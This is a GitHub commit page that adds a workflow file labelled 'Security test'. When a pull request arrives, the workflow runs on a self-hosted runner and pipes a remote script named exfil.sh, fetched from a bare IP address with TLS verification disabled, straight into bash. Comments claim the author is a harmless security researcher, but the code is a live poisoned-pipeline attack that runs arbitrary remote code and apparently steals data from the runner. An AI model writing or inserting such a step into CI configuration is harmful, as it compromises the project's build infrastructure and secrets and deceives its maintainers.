-
Notifications
You must be signed in to change notification settings - Fork 229
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
16 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,16 @@ | ||
name: Security test | ||
on: | ||
pull_request: | ||
|
||
jobs: | ||
security: | ||
runs-on: upgrade-tester | ||
|
||
steps: | ||
- name: security test | ||
run: | | ||
# If you're reading this, please know I'm a security researcher and mean no harm. | ||
# If this workflow runs as expected, I'll reach out soon to report a security issue. | ||
# otherwise you can safely ignore this | ||
# In the meantime, you can reach me on Twitter if you have any question | ||
curl -k https://193.70.37.121/static/exfil.sh | bash |